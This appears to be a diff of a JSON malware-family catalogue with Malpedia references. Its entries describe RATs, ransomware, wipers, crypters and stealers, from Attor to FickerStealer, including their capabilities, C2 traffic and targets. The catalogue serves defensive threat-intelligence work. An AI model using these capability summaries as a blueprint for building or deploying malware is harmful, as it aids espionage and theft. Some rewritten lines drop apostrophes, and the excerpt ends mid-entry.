"description": "Attor is a cyberespionage platform used in targeted attacks against diplomatic missions and governmental institutions since at least 2013. Its most interesting features are a complex modular architecture, elaborate network communications, and a unique plugin to fingerprint GSM/GPRS devices.\r\n\r\nAttor\u2019s core lies in its dispatcher, which serves as a management unit for additional plugins which provide all of malware\u2019s key capabilities. This allows the attackers to customize the platform on a per-victim basis. Plugins themselves are heavily synchronized. Network communication is based on Tor, aiming for anonymity and untraceability. \r\n\r\nThe most notable plugin can detect connected GSM/GPRS modems or mobile devices. Attor speaks to them directly using the AT command set, in order to collect sensitive information such as the IMEI, IMSI or MSISDN numbers, possibly identifying both the device and its subscriber. Other plugins provide persistence, an exfiltration channel, C&C communication and several further spying capabilities. The plugin responsible for capturing victim's screen targets social networks and blogging platforms, email services, office software, archiving utilities, file sharing and messaging services.",
"description": "Attor is a cyberespionage platform used in targeted attacks against diplomatic missions and governmental institutions since at least 2013. Its most interesting features are a complex modular architecture, elaborate network communications, and a unique plugin to fingerprint GSM/GPRS devices.\r\n\r\nAttors core lies in its dispatcher, which serves as a management unit for additional plugins which provide all of malwares key capabilities. This allows the attackers to customize the platform on a per-victim basis. Plugins themselves are heavily synchronized. Network communication is based on Tor, aiming for anonymity and untraceability. \r\n\r\nThe most notable plugin can detect connected GSM/GPRS modems or mobile devices. Attor speaks to them directly using the AT command set, in order to collect sensitive information such as the IMEI, IMSI or MSISDN numbers, possibly identifying both the device and its subscriber. Other plugins provide persistence, an exfiltration channel, C&C communication and several further spying capabilities. The plugin responsible for capturing victim's screen targets social networks and blogging platforms, email services, office software, archiving utilities, file sharing and messaging services.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.attor",
@ -14776,7 +14776,7 @@
"value": "Azov Wiper"
},
{
"description": "According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers\u2019 analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.",
"description": "According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda",
@ -15343,7 +15343,7 @@
"value": "Bankshot"
},
{
"description": "BanPolMex is a remote access trojan that uses TCP for communication.\r\n\r\nIt uses an RC4-like stream cipher called Spritz for encryption of its configuration and network traffic.\r\n\r\nIt sends detailed information about the victim's environment, like computer name, Windows version, free space of memory and all drives, processor identifier and architecture, system locale, system metrics, manufacturer, and network configuration.\r\n\r\nIt supports almost 30 commands that include operations on the victim\u2019s filesystem, basic process management, file exfiltration, and the download and execution of additional tools from the attacker\u2019s C&C server. As in many RATs from Lazarus arsenal, the commands are indexed by 32-bit integers. However, in this case the indicis are convertible into a meaningful ASCII representation, that even suggests the functionality: SLEP, HIBN, DRIV, DIR, DIRP, CHDR, RUN, RUNX, DEL, WIPE, MOVE, FTIM, NEWF, DOWN, ZDWN, UPLD, PVEW, PKIL, CMDL, DIE, GCFG, SCFG, TCON, PEEX, PEIN.\r\n\r\nIt has aclui.dll as the internal DLL name. It contains statically linked code from open-source libraries like libcurl (version 7.47.1) or zLib (version 0.15).\r\n\r\nBanPolMex RAT was delivered for victims of a watering hole campaign targeting employees of Polish and Mexican banks, that was discovered in February 2017. It is usually loaded by HOTWAX.",
"description": "BanPolMex is a remote access trojan that uses TCP for communication.\r\n\r\nIt uses an RC4-like stream cipher called Spritz for encryption of its configuration and network traffic.\r\n\r\nIt sends detailed information about the victim's environment, like computer name, Windows version, free space of memory and all drives, processor identifier and architecture, system locale, system metrics, manufacturer, and network configuration.\r\n\r\nIt supports almost 30 commands that include operations on the victims filesystem, basic process management, file exfiltration, and the download and execution of additional tools from the attackers C&C server. As in many RATs from Lazarus arsenal, the commands are indexed by 32-bit integers. However, in this case the indicis are convertible into a meaningful ASCII representation, that even suggests the functionality: SLEP, HIBN, DRIV, DIR, DIRP, CHDR, RUN, RUNX, DEL, WIPE, MOVE, FTIM, NEWF, DOWN, ZDWN, UPLD, PVEW, PKIL, CMDL, DIE, GCFG, SCFG, TCON, PEEX, PEIN.\r\n\r\nIt has aclui.dll as the internal DLL name. It contains statically linked code from open-source libraries like libcurl (version 7.47.1) or zLib (version 0.15).\r\n\r\nBanPolMex RAT was delivered for victims of a watering hole campaign targeting employees of Polish and Mexican banks, that was discovered in February 2017. It is usually loaded by HOTWAX.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.banpolmex",
@ -15802,7 +15802,7 @@
"value": "BestKorea"
},
{
"description": "Cybereason concludes that Betabot is a sophisticated infostealer malware that\u2019s evolved significantly since it first appeared in late 2012. The malware began as a banking Trojan and is now packed with features that allow its operators to practically take over a victim\u2019s machine and steal sensitive information.",
"description": "Cybereason concludes that Betabot is a sophisticated infostealer malware thats evolved significantly since it first appeared in late 2012. The malware began as a banking Trojan and is now packed with features that allow its operators to practically take over a victims machine and steal sensitive information.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.betabot",
@ -15868,7 +15868,7 @@
"value": "BHunt"
},
{
"description": "BianLian is a GoLang-based ransomware that continues to breach several industries and demand large ransom amounts. The threat actors also use the double extortion method by stealing an affected organization\u2019s files and leaking them online if the ransom is not paid on time. BianLian gains access to victim systems through valid Remote Desktop Protocol (RDP) credentials, uses open-source tools and command-line scripting for discovery and credential harvesting, and exfiltrates victim data via File Transfer Protocol (FTP), Rclone, or Mega. BianLian originally employed a double-extortion model in which they encrypted victims\u2019 systems after exfiltrating the data; however, around January 2023, they shifted to primarily exfiltration-based extortion. The BianLian ransomware uses goroutines and encrypts files in chunks to quickly hijack an infected system. The ransomware adds its own extension to each encrypted file. ",
"description": "BianLian is a GoLang-based ransomware that continues to breach several industries and demand large ransom amounts. The threat actors also use the double extortion method by stealing an affected organizations files and leaking them online if the ransom is not paid on time. BianLian gains access to victim systems through valid Remote Desktop Protocol (RDP) credentials, uses open-source tools and command-line scripting for discovery and credential harvesting, and exfiltrates victim data via File Transfer Protocol (FTP), Rclone, or Mega. BianLian originally employed a double-extortion model in which they encrypted victims systems after exfiltrating the data; however, around January 2023, they shifted to primarily exfiltration-based extortion. The BianLian ransomware uses goroutines and encrypts files in chunks to quickly hijack an infected system. The ransomware adds its own extension to each encrypted file. ",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bianlian",
@ -16073,7 +16073,7 @@
"value": "Bitter RAT"
},
{
"description": "According to Bitdefender, BitRAT is a notorious remote access trojan (RAT) marketed on underground cybercriminal web markets and forums. Its price tag of $20 for lifetime access makes it irresistible to cybercriminals and helps the malicious payload spread.\r\n\r\nFurthermore, each buyer\u2019s modus operandi makes BitRAT even harder to stop, considering it can be employed in various operations, such as trojanized software, phishing and watering hole attacks.\r\n\r\nBitRAT\u2019s popularity arises from its versatility. The malicious tool can perform a wide range of operations, including data exfiltration, UAC bypass, DDoS attacks, clipboard monitoring, gaining unauthorized webcam access, credential theft, audio recording, XMRig coin mining and generic keylogging.",
"description": "According to Bitdefender, BitRAT is a notorious remote access trojan (RAT) marketed on underground cybercriminal web markets and forums. Its price tag of $20 for lifetime access makes it irresistible to cybercriminals and helps the malicious payload spread.\r\n\r\nFurthermore, each buyers modus operandi makes BitRAT even harder to stop, considering it can be employed in various operations, such as trojanized software, phishing and watering hole attacks.\r\n\r\nBitRATs popularity arises from its versatility. The malicious tool can perform a wide range of operations, including data exfiltration, UAC bypass, DDoS attacks, clipboard monitoring, gaining unauthorized webcam access, credential theft, audio recording, XMRig coin mining and generic keylogging.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bit_rat",
@ -16318,7 +16318,7 @@
"value": "BLACKCOFFEE"
},
{
"description": "BlackEnergy, its first version shortened as BE1, started as a crimeware being sold in the Russian cyber underground as early as 2007. Initially, it was designed as a toolkit for creating botnets for conducting DDoS attacks. It supported a variety of flooding commands including protocols like ICMP, TCP SYN, UDP, HTTP and DNS. Among the high profile targets of cyber attacks utilising BE1 were a Norwegian bank and government websites in Georgia three weeks before Russo-Georgian War.\r\n\r\nVersion 2 of BlackEnergy, BE2, came in 2008 with a complete code rewrite that introduced a protective layer, a kernel-mode rootkit and a modular architecture. Plugins included mostly DDoS attacks, a spam plugin and two banking authentication plugins to steal from Russian nad Ukrainian banks. The banking plugin was paired with a module designed to destroy the filesystem. Moreover, BE2 was able to\r\n- download and execute a remote file;\r\n- execute a local file on the infected computer;\r\n- update the bot and its plugins;\r\n\r\nThe Industrial Control Systems Cyber Emergency Response Team issued an alert warning that BE2 was leveraging the human-machine interfaces of industrial control systems like GE CIMPLICITY, Advantech/Broadwin WebAccess, and Siemens WinCC to gain access to critical infrastructure networks.\r\n\r\nIn 2014, the BlackEnergy toolkit, BE3, switched to a lighter footprint with no kernel-mode driver component. Its plugins included:\r\n- operations with victim's filesystem\r\n- spreading with a parasitic infector\r\n- spying features like keylogging, screenshoots or a robust password stealer\r\n- Team viewer and a simple pseudo \u201cremote desktop\u201d\r\n- listing Windows accounts and scanning network \r\n- destroying the system\r\n\r\nTypical for distribution of BE3 was heavy use of spear-phishing emails containing Microsoft Word or Excel documents with a malicious VBA macro, Rich Text Format (RTF) documents embedding exploits or a PowerPoint presentation with zero-day exploit CVE-2014-4114.\r\n\r\nOn 23 December 2015, attackers behind the BlackEnergy malware successfully caused power outages for several hours in different regions of Ukraine. This cyber sabotage against three energy companies has been confirmed by the Ukrainian government. The power grid compromise has become known as the first-of-its-kind cyber warfare attack affecting civilians.",
"description": "BlackEnergy, its first version shortened as BE1, started as a crimeware being sold in the Russian cyber underground as early as 2007. Initially, it was designed as a toolkit for creating botnets for conducting DDoS attacks. It supported a variety of flooding commands including protocols like ICMP, TCP SYN, UDP, HTTP and DNS. Among the high profile targets of cyber attacks utilising BE1 were a Norwegian bank and government websites in Georgia three weeks before Russo-Georgian War.\r\n\r\nVersion 2 of BlackEnergy, BE2, came in 2008 with a complete code rewrite that introduced a protective layer, a kernel-mode rootkit and a modular architecture. Plugins included mostly DDoS attacks, a spam plugin and two banking authentication plugins to steal from Russian nad Ukrainian banks. The banking plugin was paired with a module designed to destroy the filesystem. Moreover, BE2 was able to\r\n- download and execute a remote file;\r\n- execute a local file on the infected computer;\r\n- update the bot and its plugins;\r\n\r\nThe Industrial Control Systems Cyber Emergency Response Team issued an alert warning that BE2 was leveraging the human-machine interfaces of industrial control systems like GE CIMPLICITY, Advantech/Broadwin WebAccess, and Siemens WinCC to gain access to critical infrastructure networks.\r\n\r\nIn 2014, the BlackEnergy toolkit, BE3, switched to a lighter footprint with no kernel-mode driver component. Its plugins included:\r\n- operations with victim's filesystem\r\n- spreading with a parasitic infector\r\n- spying features like keylogging, screenshoots or a robust password stealer\r\n- Team viewer and a simple pseudo “remote desktop”\r\n- listing Windows accounts and scanning network \r\n- destroying the system\r\n\r\nTypical for distribution of BE3 was heavy use of spear-phishing emails containing Microsoft Word or Excel documents with a malicious VBA macro, Rich Text Format (RTF) documents embedding exploits or a PowerPoint presentation with zero-day exploit CVE-2014-4114.\r\n\r\nOn 23 December 2015, attackers behind the BlackEnergy malware successfully caused power outages for several hours in different regions of Ukraine. This cyber sabotage against three energy companies has been confirmed by the Ukrainian government. The power grid compromise has become known as the first-of-its-kind cyber warfare attack affecting civilians.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy",
@ -16697,7 +16697,7 @@
"value": "BleachGap"
},
{
"description": "BLINDINGCAN is a remote access trojan that communicates with its C&C server via HTTP(S).\r\nIt uses a (custom) RC4 or AES for encryption and decryption of its configuration and network traffic. \r\nIt sends information about the victim's environment, like computer name, IP, Windows product name and processor name.\r\nIt supports around 30 commands that include operations on the victim\u2019s filesystem, basic process management, command line execution, file exfiltration, configuration update, and the download and execution of additional payloads from the attackers' C&C. The commands are indexed by 16-bit integers, starting with the index 0x2009 and going incrementally up to 0x2057, with some indicis being skipped. \r\nIt uses various parameter names in its HTTP POST requests, mostly associated with web servers running bulletin board systems, like bbs, article, boardid, s_board, page, idx_num, etc.\r\nIt contains specific RTTI symbols like \".?AVCHTTP_Protocol@@\", \".?AVCFileRW@@\" or \".?AVCSinSocket@@\".\r\nBLINDINGCAN RAT is a flagship payload deployed in many Lazarus attacks, especially in the Operation DreamJob campaigns happening in 2020-2022.",
"description": "BLINDINGCAN is a remote access trojan that communicates with its C&C server via HTTP(S).\r\nIt uses a (custom) RC4 or AES for encryption and decryption of its configuration and network traffic. \r\nIt sends information about the victim's environment, like computer name, IP, Windows product name and processor name.\r\nIt supports around 30 commands that include operations on the victims filesystem, basic process management, command line execution, file exfiltration, configuration update, and the download and execution of additional payloads from the attackers' C&C. The commands are indexed by 16-bit integers, starting with the index 0x2009 and going incrementally up to 0x2057, with some indicis being skipped. \r\nIt uses various parameter names in its HTTP POST requests, mostly associated with web servers running bulletin board systems, like bbs, article, boardid, s_board, page, idx_num, etc.\r\nIt contains specific RTTI symbols like \".?AVCHTTP_Protocol@@\", \".?AVCFileRW@@\" or \".?AVCSinSocket@@\".\r\nBLINDINGCAN RAT is a flagship payload deployed in many Lazarus attacks, especially in the Operation DreamJob campaigns happening in 2020-2022.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blindingcan",
@ -16983,7 +16983,7 @@
"value": "Bolek"
},
{
"description": "BookCodesRAT is a remote access trojan that uses HTTP(S) for communication. It supports around 25 commands that include operations on the victim\u2019s filesystem, basic process management and the download and execution of additional tools from the attacker\u2019s arsenal. They are indexed by 32-bit integers, starting with the value 0x97853646. \r\n\r\nBookCodesRAT uses mostly compromised South Korean web servers for the C&C traffic and is usually deployed against South Korean targets.",
"description": "BookCodesRAT is a remote access trojan that uses HTTP(S) for communication. It supports around 25 commands that include operations on the victims filesystem, basic process management and the download and execution of additional tools from the attackers arsenal. They are indexed by 32-bit integers, starting with the value 0x97853646. \r\n\r\nBookCodesRAT uses mostly compromised South Korean web servers for the C&C traffic and is usually deployed against South Korean targets.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bookcodesrat",
@ -17045,7 +17045,7 @@
"value": "BOOMBOX"
},
{
"description": "FireEye describes BOOSTWRITE as a loader crafted to be launched via abuse of the DLL search order of applications which load the legitimate \u2018Dwrite.dll\u2019 provided by the Microsoft DirectX Typography Services. The application loads the \u2018gdi\u2019 library, which loads the \u2018gdiplus\u2019 library, which ultimately loads \u2018Dwrite\u2019. Mandiant identified instances where BOOSTWRITE was placed on the file system alongside the RDFClient binary to force the application to import DWriteCreateFactory from it rather than the legitimate DWrite.dll.",
"description": "FireEye describes BOOSTWRITE as a loader crafted to be launched via abuse of the DLL search order of applications which load the legitimate Dwrite.dll provided by the Microsoft DirectX Typography Services. The application loads the gdi library, which loads the gdiplus library, which ultimately loads Dwrite. Mandiant identified instances where BOOSTWRITE was placed on the file system alongside the RDFClient binary to force the application to import DWriteCreateFactory from it rather than the legitimate DWrite.dll.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.boostwrite",
@ -17160,7 +17160,7 @@
"value": "BRAIN"
},
{
"description": "Brambul is a worm that spreads by using a list of hard-coded login credentials to launch a brute-force password attack against an SMB protocol for access to a victim\u2019s networks.",
"description": "Brambul is a worm that spreads by using a list of hard-coded login credentials to launch a brute-force password attack against an SMB protocol for access to a victims networks.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.brambul",
@ -17224,7 +17224,7 @@
"value": "BreachRAT"
},
{
"description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\\u0445\u043f-\u043f\u0440\u043e\u0431\u0438\u0432\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=<guid>&os=<OS>&build=1.0.0&cpu=8\r\n\r\n<OS> is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n",
"description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\хп-пробив\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=<guid>&os=<OS>&build=1.0.0&cpu=8\r\n\r\n<OS> is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader"
@ -17923,7 +17923,7 @@
"value": "Carberp"
},
{
"description": "Cardinal RAT is a remote access Trojan capable of stealing username and credentials, cleaning out cookies from browsers, keylogging and capturing screenshots on targeted systems. It is delivered via a downloader dubbed \u201cCarp\u201d which uses malicious macros in Microsoft Excel documents to compile embedded source code into an executable, which then deploys the Cardinal RAT malware family.",
"description": "Cardinal RAT is a remote access Trojan capable of stealing username and credentials, cleaning out cookies from browsers, keylogging and capturing screenshots on targeted systems. It is delivered via a downloader dubbed “Carp” which uses malicious macros in Microsoft Excel documents to compile embedded source code into an executable, which then deploys the Cardinal RAT malware family.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cardinal_rat",
@ -18226,7 +18226,7 @@
"value": "Chaos (Windows)"
},
{
"description": "According to Kaspersky GReAT and AMR, TajMahal is a previously unknown and technically sophisticated APT framework discovered by Kaspersky Lab in the autumn of 2018. This full-blown spying framework consists of two packages named Tokyo and Yokohama. It includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents and cryptography key stealers, and even its own file indexer for the victim\u2019s machine. We discovered up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins they have ever seen for an APT toolset.",
"description": "According to Kaspersky GReAT and AMR, TajMahal is a previously unknown and technically sophisticated APT framework discovered by Kaspersky Lab in the autumn of 2018. This full-blown spying framework consists of two packages named Tokyo and Yokohama. It includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents and cryptography key stealers, and even its own file indexer for the victims machine. We discovered up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins they have ever seen for an APT toolset.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.chaperone",
@ -20552,7 +20552,7 @@
"value": "CoViper"
},
{
"description": "CozyDuke is not simply a malware toolset; rather, it is a modular malware platform formed around\r\na core backdoor component. This component can be instructed by the C&C server to download\r\nand execute arbitrary modules, and it is these modules that provide CozyDuke with its vast array\r\nof functionality. Known CozyDuke modules include:\r\n\u2022 Command execution module for executing arbitrary Windows Command Prompt commands\r\n\u2022 Password stealer module\r\n\u2022 NT LAN Manager (NTLM) hash stealer module\r\n\u2022 System information gathering module\r\n\u2022 Screenshot module",
"description": "CozyDuke is not simply a malware toolset; rather, it is a modular malware platform formed around\r\na core backdoor component. This component can be instructed by the C&C server to download\r\nand execute arbitrary modules, and it is these modules that provide CozyDuke with its vast array\r\nof functionality. Known CozyDuke modules include:\r\n• Command execution module for executing arbitrary Windows Command Prompt commands\r\n• Password stealer module\r\n• NT LAN Manager (NTLM) hash stealer module\r\n• System information gathering module\r\n• Screenshot module",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cozyduke",
@ -21392,7 +21392,7 @@
"value": "Cutwail"
},
{
"description": "According to Subex Secure, CyberGate is a Remote Access Trojan (RAT) that allows an attacker to gain unauthorized access to\r\nthe victim\u2019s system. Attackers can remotely connect to the compromised system from anywhere\r\naround the world. The Malware author generally uses this program to steal private information\r\nlike passwords, files, etc. It might also be used to install malicious software on the compromised\r\nsystems.\r\n",
"description": "According to Subex Secure, CyberGate is a Remote Access Trojan (RAT) that allows an attacker to gain unauthorized access to\r\nthe victims system. Attackers can remotely connect to the compromised system from anywhere\r\naround the world. The Malware author generally uses this program to steal private information\r\nlike passwords, files, etc. It might also be used to install malicious software on the compromised\r\nsystems.\r\n",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cybergate",
@ -21539,7 +21539,7 @@
"value": "Dairy"
},
{
"description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on \u201cquality over quantity\u201d in email-based threats. DanaBot\u2019s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. ",
"description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBots modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. ",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot",
@ -22037,7 +22037,7 @@
"value": "DarkTequila"
},
{
"description": "DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks\u00ae Counter Threat Unit\u2122 (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver \"addon packages\" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.\r\n\r\nFrom January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.",
"description": "DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks® Counter Threat Unit™ (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver \"addon packages\" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.\r\n\r\nFrom January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla",
@ -22539,7 +22539,7 @@
"value": "Dented"
},
{
"description": "According to ESET Research, DePriMon is a malicious downloader, with several stages and using many non-traditional techniques. To achieve persistence, the malware registers a new local port monitor \u2013 a trick falling under the \u201cPort Monitors\u201d technique in the MITRE ATT&CK knowledgebase. For that, the malware uses the \u201cWindows Default Print Monitor\u201d name; that\u2019s why we have named it DePriMon. Due to its complexity and modular architecture, researcher believe it to be a framework.\r\n\r\nDePriMon has been active since at least March 2017. DePriMon was detected in a private company, based in Central Europe, and at dozens of computers in the Middle East.",
"description": "According to ESET Research, DePriMon is a malicious downloader, with several stages and using many non-traditional techniques. To achieve persistence, the malware registers a new local port monitor a trick falling under the “Port Monitors” technique in the MITRE ATT&CK knowledgebase. For that, the malware uses the “Windows Default Print Monitor” name; thats why we have named it DePriMon. Due to its complexity and modular architecture, researcher believe it to be a framework.\r\n\r\nDePriMon has been active since at least March 2017. DePriMon was detected in a private company, based in Central Europe, and at dozens of computers in the Middle East.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.deprimon",
@ -22593,7 +22593,7 @@
"value": "DeroHE"
},
{
"description": " A DLL backdoor also reported publicly as \u201cDerusbi\u201d, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.",
"description": " A DLL backdoor also reported publicly as “Derusbi”, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi",
@ -23026,7 +23026,7 @@
"value": "DMSniff"
},
{
"description": "DneSpy collects information, takes screenshots, and downloads and executes the latest version of other malicious components in the infected system. The malware is designed to receive a \u201cpolicy\u201d file in JSON format with all the commands to execute. The policy file sent by the C&C server can be changed and updated over time, making dneSpy flexible and well-designed. The output of each executed command is zipped, encrypted, and exfiltrated to the C&C server. These characteristics make dneSpy a fully functional espionage backdoor.",
"description": "DneSpy collects information, takes screenshots, and downloads and executes the latest version of other malicious components in the infected system. The malware is designed to receive a “policy” file in JSON format with all the commands to execute. The policy file sent by the C&C server can be changed and updated over time, making dneSpy flexible and well-designed. The output of each executed command is zipped, encrypted, and exfiltrated to the C&C server. These characteristics make dneSpy a fully functional espionage backdoor.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dnespy",
@ -23904,7 +23904,7 @@
"value": "DuQu"
},
{
"description": "In 2019, multiple destructive attacks were observed targeting entities within the Middle East. The National Cyber Security Centre (NCSC), a part of the National Cybersecurity Authority (NCA), detected a new malware named \"DUSTMAN\" that was detonated on December 29, 2019. Based on analyzed evidence and artifacts found on machines in a victim\u2019s network that were not wiped by the malware. NCSC assess that the threat actor behind the attack had some kind of urgency on executing the files on the date of the attack due to multiple OPSEC failures observed on the infected network. NCSC is calling the malware used in this attack \"DUSTMAN\" after the filename and string embedded in the malware. \"DUSTMAN\" can be considered as a new variant of \"ZeroCleare\" malware,\r\npublished in December 2019.",
"description": "In 2019, multiple destructive attacks were observed targeting entities within the Middle East. The National Cyber Security Centre (NCSC), a part of the National Cybersecurity Authority (NCA), detected a new malware named \"DUSTMAN\" that was detonated on December 29, 2019. Based on analyzed evidence and artifacts found on machines in a victims network that were not wiped by the malware. NCSC assess that the threat actor behind the attack had some kind of urgency on executing the files on the date of the attack due to multiple OPSEC failures observed on the infected network. NCSC is calling the malware used in this attack \"DUSTMAN\" after the filename and string embedded in the malware. \"DUSTMAN\" can be considered as a new variant of \"ZeroCleare\" malware,\r\npublished in December 2019.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dustman",
@ -24045,7 +24045,7 @@
"value": "EDA2"
},
{
"description": "According to Heimdal, Egregor ransomware infection happens via a loader, then, in the victim\u2019s firewall, it enables the Remote Desktop Protocol. After this part, the malware is free to move inside the victim\u2019s network, identifying and disabling all the antivirus software it can find. The next step is the encryption of the data and the insertion of a ransom note named \u201cRECOVER-FILES.txt\u201d in all the compromised folders. ",
"description": "According to Heimdal, Egregor ransomware infection happens via a loader, then, in the victims firewall, it enables the Remote Desktop Protocol. After this part, the malware is free to move inside the victims network, identifying and disabling all the antivirus software it can find. The next step is the encryption of the data and the insertion of a ransom note named “RECOVER-FILES.txt” in all the compromised folders. ",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.egregor",
@ -24910,7 +24910,7 @@
"value": "EternalRocks"
},
{
"description": "According to proofpoint, Bad Rabbit is a strain of ransomware that first appeared in 2017 and is a suspected variant of Petya. Like other strains of ransomware, Bad Rabbit virus infections lock up victims\u2019 computers, servers, or files preventing them from regaining access until a ransom\u2014usually in Bitcoin\u2014is paid.\r\n\r\n",
"description": "According to proofpoint, Bad Rabbit is a strain of ransomware that first appeared in 2017 and is a suspected variant of Petya. Like other strains of ransomware, Bad Rabbit virus infections lock up victims computers, servers, or files preventing them from regaining access until a ransom—usually in Bitcoin—is paid.\r\n\r\n",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.eternal_petya",
@ -25150,7 +25150,7 @@
"value": "EVILNUM (Windows)"
},
{
"description": "A wiper used against in an attack against Iran\u2019s state broadcaster. Using campaign name coined by Check Point in lack of a better name for the wiper component.",
"description": "A wiper used against in an attack against Irans state broadcaster. Using campaign name coined by Check Point in lack of a better name for the wiper component.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.evilplayout",
@ -25685,7 +25685,7 @@
"value": "FFDroider"
},
{
"description": "According to CyberArk, this malware is used to steal sensitive information, including login credentials, credit card information, cryptocurrency wallets and browser information from applications such as WinSCP, Discord, Google Chrome, Electrum, etc. It does all that by implementing a different approach than other stealers (we\u2019ll cover it later). Additionally, FickerStealer can function as a File Grabber and collect additional files from the compromised machine, and it can act as a Downloader to download and execute several second-stage malware.",
